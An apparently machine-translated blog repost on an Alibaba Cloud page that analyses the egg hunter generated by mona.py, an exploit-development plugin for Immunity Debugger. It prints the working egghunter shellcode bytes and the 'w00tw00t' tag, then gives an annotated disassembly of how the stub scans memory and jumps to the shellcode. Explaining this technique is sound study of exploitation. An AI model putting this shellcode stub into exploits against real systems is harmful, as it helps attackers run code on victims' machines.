Analysis of the egg hunter method of mona. py

Source: Internet
Author: User

 

Mona is a plug-in for Immunity Debugger. It has powerful functions and can help exploit programmers quickly find the desired command sequence and many useful Memory search functions. The egg hunter code generation function is available. The default generation result is as follows:

 

========================================================== ==========================================================

Output generated by mona. py v1.1

Corelan Team-http://www.corelan.be

========================================================== ==========================================================

OS: xp, release 5.1.2600

Process being debugged: php (pid 15016)

========================================================== ==========================================================

22:20:41

========================================================== ==========================================================

Egghunter, tag w00t:

"\ X66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd \ x2e \ x3c \ x05 \ x5a \ x74"

"\ Xef \ xb8 \ x77 \ x30 \ x30 \ x74 \ x8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7"

Put this tag in front of your shellcode: w00tw00t

After debugging this command sequence in OD, you can sort out the following code:

 

00406030 66: 81CA FF0F or dx, 0FFF; generate an initial value of edx

00406035 42 inc edx; move EDX --- code

00406036 52 push edx; save EDX to the stack

00406037 6A 02 PUSH 2;

00406039 58 pop eax; send 2 to eax, which is the system call number

0040603A CD 2E INT 2E;

0040603C 3C 05 cmp al, 5; the system calls INT 2E and compares whether AL is 5. Note that if the value in EDX is not writable, EAX = C0000005 or C00000C5

0040603E 5A pop edx; restore the EDX Value

0040603F ^ 74 ef je short shellcod.00406030; if [EDX] cannot be written, jump to code

00406041 B8 77303074 mov eax, 74303077

00406046 8BFA mov edi, EDX

00406048 af scas dword ptr es: [EDI]; check whether the memory pointed by EDI is EAX Value

00406049 ^ 75 ea jnz short shellcod.00406035;

0040604B af scas dword ptr es: [EDI]; if you continue to judge whether the directed memory is EAX value (note that 4 is added to EDI after SCAS)

0040604C ^ 75 E7 jnz short shellcod.00406035; if not, jump to code

0040604E FFE7 jmp edi; find egg, jump to the found code and execute

 

From painful beliefs

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.